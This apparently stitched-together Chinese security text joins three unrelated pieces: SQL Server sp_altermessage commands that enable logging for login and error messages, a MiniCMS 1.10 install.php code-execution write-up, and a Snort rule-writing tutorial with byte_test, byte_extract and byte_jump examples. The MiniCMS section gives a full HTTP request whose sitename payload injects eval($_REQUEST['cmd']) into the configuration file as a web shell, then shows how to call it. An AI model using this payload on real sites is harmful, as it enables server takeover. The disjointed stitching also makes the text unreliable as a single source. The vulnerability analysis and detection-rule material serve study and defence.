EXEC sp_altermessage 18470,'WITH_LOG',TRUE
EXEC sp_altermessage 18468,'WITH_LOG',TRUE
EXEC sp_altermessage 18467,'WITH_LOG',TRUE
EXEC sp_altermessage 18466,'WITH_LOG',TRUE
EXEC sp_altermessage 18465,'WITH_LOG',TRUE
EXEC sp_altermessage 18464,'WITH_LOG',TRUE
EXEC sp_altermessage 18463,'WITH_LOG',TRUE
EXEC sp_altermessage 18462,'WITH_LOG',TRUE
EXEC sp_altermessage 18461,'WITH_LOG',TRUE
EXEC sp_altermessage 18456,'WITH_LOG',TRUE
EXEC sp_altermessage 18451,'WITH_LOG',TRUE
EXEC sp_altermessage 18401,'WITH_LOG',TRUE
EXEC sp_altermessage 15538,'WITH_LOG',TRUE
EXEC sp_altermessage 15537,'WITH_LOG',TRUE
EXEC sp_altermessage 28046,'WITH_LOG',TRUE
EXEC sp_altermessage 18455,'WITH_LOG',TRUE
EXEC sp_altermessage 18454,'WITH_LOG',TRUE
EXEC sp_altermessage 18453,'WITH_LOG',TRUE
EXEC sp_altermessage 17311,'WITH_LOG',TRUE
EXEC sp_altermessage 17308,'WITH_LOG',TRUE
EXEC sp_altermessage 5011,'WITH_LOG',TRUE
EXEC sp_altermessage 916,'WITH_LOG',TRUE
EXEC sp_altermessage 300,'WITH_LOG',TRUE
EXEC sp_altermessage 262,'WITH_LOG',TRUE
EXEC sp_altermessage 230,'WITH_LOG',TRUE
EXEC sp_altermessage 229,'WITH_LOG',TRUE
EXEC sp_altermessage 18100,'WITH_LOG',TRUE
EXEC sp_altermessage 825,'WITH_LOG',TRUE
EXEC sp_altermessage 806,'WITH_LOG',TRUE
EXEC sp_altermessage 17557,'WITH_LOG',TRUE
EXEC sp_altermessage 15615,'WITH_LOG',TRUE
EXEC sp_altermessage 15612,'WITH_LOG',TRUE
EXEC sp_altermessage 9100,'WITH_LOG',TRUE
EXEC sp_altermessage 8440,'WITH_LOG',TRUE
EXEC sp_altermessage 2514,'WITH_LOG',TRUE
EXEC sp_altermessage 2510,'WITH_LOG',TRUE
EXEC sp_altermessage 2509,'WITH_LOG',TRUE
EXEC sp_altermessage 610,'WITH_LOG',TRUE
EXEC sp_altermessage 427,'WITH_LOG',TRUE

仅id：211,28048,18488,18487,18486,18471,18470,18468,18467,18466,18465,18464,18463,18462,18461,18456,18451,18401,15538,15537,28046,18455,18454,18453,17311,17308,5011,916,300,262,230,229,18100,825,806,17557,15615,15612,9100,8440,2514,2510,2509,610,427

MiniCMS代码执行漏洞

Sun, 10 May 2026 09:47:38 GMT

简述

根据CVE漏洞情报描述，MiniCMS 1.10 允许通过 install.php sitename 参数执行任意 PHP 代码，这会影响 mc_conf.php 中的 site_name 字段。实际上，漏洞点不止一个sitename参数。

漏洞环境

下载1.10版本

解压后命名将文件夹为minicms，移动文件夹到web目录下，并将minicms目录下的install.txt文件修改为install.php ，访问 http://yourip/minicms/install.php

（下载的是1.10，不知道为什么显示v1.9）

点击提交并抓包

复现

POST /minicms/install.php HTTP/1.1
Host: 192.168.249.128:81
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.249.128:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.246 Safari/537.36 Qaxbrowser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.249.128:81/minicms/install.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

sitename='%29;eval($_REQUEST['cmd']);/*&sitelink=http%3A%2F%2F192.168.249.128:81%2Fminicms&nickname=%E7%A5%9E%E7%A7%98%E4%BA%BA&username=admin&password=123456&start_install=%E5%BC%80%E5%A7%8B%E5%AE%89%E8%A3%85

将sitename修改为以上的payload '%29;eval($_REQUEST['cmd']);/* ，返回200

访问shell http://yourip/minicms/?cmd=phpinfo();

漏洞成因

代码

查看install.php ，显然，安装完成后这个文件自己删除了，所以需要备份install.txt查看

首先通过 start_install 参数判断请求操作

接着判断配置文件 mc-conf.php 是否存在，来判断进行第一次安装还是升级

来到漏洞关键的代码，如果start_install非空，进行安装，file_put_contents将 sitelink 等参数直接写进 mc-conf.php 配置文件，同时这5个参数是用户可控的

后续代码创建其他一些索引文件，最后 unlink 删除自身，显然，这个漏洞一般没法利用，逻辑上来说安装完网站后不存在漏洞利用，只能在安装的时候被利用一次，只有监守自盗的可能了。

配置文件

看看创建后的 mc-conf.php

很直接简单的拼接，每个参数的格式一样，只需要闭合前面的 ') ，同时注释后续的代码，即可在中间拼接恶意代码。通过测试，注入点并非如通告所说只有sitename，而是sitelink,username,password,nickname均可以作为注入点

巧用snort规则关键字，让入侵检测事半功倍

Sun, 10 May 2026 09:47:38 GMT

0. Snort简介

作为入侵检测届大名鼎鼎的前辈，snort是每一个从事入侵检测工作的安全人员成长过程中所绕不开的。snort体量非常轻便，但出色的扩展性又成就了强大的流量检测功能，可谓真正的小而美，开源的代码被后来的众多入侵检测产品当作模板所借鉴、学习。

snort是基于模式匹配的入侵检测系统，指的是系统预先定义一些入侵的特征码，在数据包到达时将其与特征码相匹配，以此来判断数据包是否包含了入侵行为。而本文探讨的正是决定其检测能力的重要因素——规则的编写。

1. 常见关键字

一条简单的snort规则（检测uri中包含有phpinfo.php字符串的数据包）

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (content:"phpinfo.php"; http_uri;)

规则分为规则头和规则选项，规则头即检测动作(alert,drop,pass,reject) 和五元组加上流量流向，这部分没有太多可琢磨的选项，重点是后续的规则选项不仅可以检测固定字符的数据，而且通过关键字的组合搭配可以检测复杂、多变的数据包。

1.1 content

作为模式匹配，最重要、最常用、最好用、也最简单的就是content关键字，当执行content选项进行模式匹配时，会调用snort的字符串搜索算法Boyer-Moore ，对数据包内容进行测试。如果在payload中指定位置捕获到与content 字符串完全匹配的数据，则匹配成功，此处的完全匹配就是content 最大的特点了，即大小写敏感且完全作为字符串，其内容只有两种形式——一种是与特征码一模一样的字符串，另一种是十六进制，需要用竖杠包裹。

例如，上述content也可以写成

content:"phpinfo|2e|php";

除此之外，content唯一可以变通的就是取反，例如，想检测 uri 中不包含phpinfo.php字符串的情况可以编写如下

content:!"phpinfo|2e|php"; http_uri;

想要其大小写不敏感，只需要在其后加入 nocase; 即可，以上是最基础和简单的用法

接下来是content 的一个重要修饰词 fast_pattern ，由于snort对content的默认行为是使用长度最长的一个优先进行匹配，但长度长不代表最具有对应漏洞特征，假如短 content 更具特殊性，fast_pattern 便大有用处。

fast_pattern 用于仅选择其修饰的content用于评估，若payload命中该content才会对规则进行评估，否则跳过，这样显然可以通过提取每条规则中的独特特征大大缩短snort的性能开销。

同时，only 可用于指定 fast_pattern 修饰的content仅用于快速模式，而不作为规则评估

注：fast_pattern:only; 修饰的content （1）不区分大小写；（2）不能取反；（3）不能有位置修饰符

1.2 pcre

pcre 允许使用与perl 兼容的正则表达式进行评估，所有的语法与普通正则一致，可在

🔗 regex101: build, test, and debug regex

该网站上查询到所有可用语法，并可在线校验正则有效性

pcre是应对复杂多变的流量特征时不可或缺的一个关键字，同时也比较占用性能资源，但倘若拥有一条严谨、完美的正则，往往令评估事半功倍。

2 byte系列

在HTTP协议中不常用，但是在其他TCP/UDP协议中常用且非常高效的几个关键字，也正是这些关键字使得简短的规则变得变幻莫测。这里举例三个通过动态获取数据包中不固定位置字符并能据此进行其他操作的关键字。

2.1 byte_test

顾名思义，是取指定位置上的特定值，使用运算符与给定值进行测试字节字段。能够测试二进制值或将具有代表性的字节字符串转换为等效的二进制并对其进行测试，结果为true则命中

格式

byte_test:<bytes_to_convert>,[!]<operator>,<value>,<offset>[,<relative>]\
				[,<endian>][,string,<number type>][,dce][,bitmask<bitmask_value>];

其中：

byte_to_convert 从数据包取得的字节数 = 1-10

ps：不使用dce时可使用的值为1-10，使用dce时的值为1，2，4

operator 对测试值执行的操作 = < = > <= >= & ^ 也就是等于还是小于大于.....

value 与测试值进行比较的转换后的值 = 0-4294967295

offset 偏移量 = -65535-65535

relative 使用相对于上一个模式匹配的相对偏移

endian 正在读取的数字的字节序类型，有默认 big 大端和 little 小端

string 数据以字符串形式存在数据包中

number type 转换后的字符串数据以何种形式表示：hex - 十六进制；dec - 十进制；oct - 八进制

dce 使用DCE/RPC 2 预处理器执行 SMB 分段和 DCE/RPC 碎片整理，依此确定要转换的值的字节顺序

bitmask 对转换的字节进行 与 运算

举个栗子

OpenSSL心脏滴血（HeartBleed）漏洞CVE-2014-0160，漏洞利用是攻击者改造带有特殊 payload_length 的心跳包发送给服务器，由于HeartBeat扩展不能正确识别恶意请求，导致服务器返回了超出设定值的信息，产生了溢出，造成数据泄露。

可见，关键在于payload_length 的长度是否异常，但这是一个阈值，使用content或者pcre无法准备判断其值大小，这时候 btye_test 就派上大用场了

使用 byte_test 取相应偏移位置上的payload_length 值，比较其是否大于限定的 16k 正常请求响应字节即可判断是否为恶意请求

content:"|18 03|"; depth:2; content:"|01|"; distance:3; within:1; byte_test:2,>=,16384,0,relative,big;

即相对前一个content匹配到的|01|后面，偏移0个字节后，取其后2个字节(payload_length)转换成十进制与16384(16k)比较，若该值大于 16384 ，byte_test返回true，即命中。

2.2 byte_extract

取得指定位置上的数据保存到一个变量中，此变量可在后续规则中使用，而不是使用硬编码值，一般与byte_test结合在一起

格式

byte_extracr:<bytes_to_convert>,<offset>,<name>,[,<relative>]\
					[, multiplier <multiplier value>][, <endian>][, string][, hex][, dec][, oct] \
	        [, align <align value>][, dce][, bitmask <bitmask>];

byte_to_convert 从数据包取得的字节数

offset 偏移量

name 给取得的变量命名

relative 使用相对于上一个模式匹配的相对偏移

举个栗子

Apache Tomcat AJP连接器任意文件访问CVE-2020-1938，又称GhostCat幽灵猫。

AJP协议是定向包（面向包）协议，采用二进制形式代替文本形式，协议由magic number + length + AJP13_FORWARD_REQUEST 组成，其中，由 server → contain 的 magicnum 为 0x1234 ，相反则为 AB ，AJP13_FORWARD_REQUEST 的结构如下：

AJP13_FORWARD_REQUEST :=
    prefix_code      (byte) 0x02 = JK_AJP13_FORWARD_REQUEST
    method           (byte)
    protocol         (string)
    req_uri          (string)
    remote_addr      (string)
    remote_host      (string)
    server_name      (string)
    server_port      (integer)
    is_ssl           (boolean)
    num_headers      (integer)
    request_headers *(req_header_name req_header_value)
    attributes      *(attribut_name attribute_value)
    request_terminator (byte) OxFF

而且，version之后的每一个字段连同了前两位的长度，攻击流量包如下

假设要判断payload中是什么协议，如果仅用content在整个数据包中任意位置匹配，结果必定是不可靠的，但是通过对AJP协议的了解，可知 version 在相对magic num后4位，虽然不同协议version的长度不同，但可以根据数据包中在协议之前记录的长度，来判断其后这段长度内的payload中是否有 HTTP 字符，示例规则

content:"|12 34|"; depth:2; content:"|02|"; within:1; distance:2; byte_extract:2,1,protocol_len,relative; content:"HTTP"; within:protocol_len;

byte_extract 对content之后偏移 1 个字节取 2 个字节的值即 0x08，命名为protocol_len ，后续的content 判断HTTP是否在其后 8 个字节内，结果为true，规则命中。

2.3 byte_jump

取对应偏移位置上的值，跳过payload中对应该值数目的字节

格式

byte_jump:<bytes_to_convert>, <offset> [, relative][, multiplier <mult_value>] \
        [, <endian>][, string, <number_type>][, align][, from_beginning][, from_end] \ 
        [, post_offset <adjustment value>][, dce][, bitmask <bitmask_value>];

byte_to_convert 从数据包取得的字节数

offset 偏移量

multiplier value 将计算的字节数乘以 <value> 并向前跳过该字节数。

relative 使用相对于上一个模式匹配的相对偏移

align 将转换的字节数四舍五入到下一个 32 位边界

from_beginning 从数据包payload的开头而不是从数据包中的当前位置向前跳过，类似content中的offset

from_end 跳转将从有效载荷的末尾开始

举个栗子

以检测PE文件为例

具体的文件结构可参考： https://www.freebuf.com/articles/network/265889.html

PE 文件头由 64位的DOS MZ头和不固定长度的DOS块以及DOS PE头组成，MZ头的前两位固定为MZ，末尾四位的值指向PE头。这种情况下，由于DOS块长度不固定，无法通过指定偏移定位到PE头，更不能在整个数据包中寻找PE字符，要知道，PE文件有时候会很大，上万的字符中匹配到PE两个字符的误报概率太大了。

据此可以得到检测思路为通过MZ头末尾四位的值找到对应位置上的字符判断是否为PE头，这时候byte_jump出马再合适不过了

示例检测代码

content:"|4d 5a|"; byte_jump:4,58,relative,little; content:"PE|00 00|"; distance:-64; within:4;

首先定位MZ头中的magic number ，去除这2位再去掉最后4位的长度，64字节的MZ头中间还有58字节，跳过这58字节，后续的4个字节即是存储了PE头在DOS头中绝对偏移位置的数值，并且在数据中是以小端存储的，接着匹配四位PE头 content:"PE|00 00|"; ，由于数据中记录的偏移位置是绝对偏移，从0开始，而byte_jump取完数后，此时的偏移在DOS MZ头之后，跳转之后并不直接指向实际PE头的位置，而是在其后多出了64字节的位置，此时便需要使用 distance:-64; 去掉多出来的字节，使得偏移回到PE头实际正确的位置，在4字节内匹配到 PE|00 00| ，规则命中。

3. 总结

本文主要重点讲述snort规则中Byte系列关键字的用法，通过三个具体的实例分析关键字及每个修饰符的含义，帮助使用者理解用法。在实际的入侵检测中，如果能够用好这几个关键字，可以在特殊字节流协议，例如SMB、OpenSSL、RPC等漏洞方面，显著提升检测率、降低误报率，并且可以节省性能资源，不仅事半功倍，还能使snort的能力发挥到最大化。

4. 参考链接

🔗 SNORT Users Manual 2.9.16

🔗 PE文件结构入门到入坟 - FreeBuf网络安全行业门户

🔗 The Apache Tomcat Connectors - AJP Protocol Reference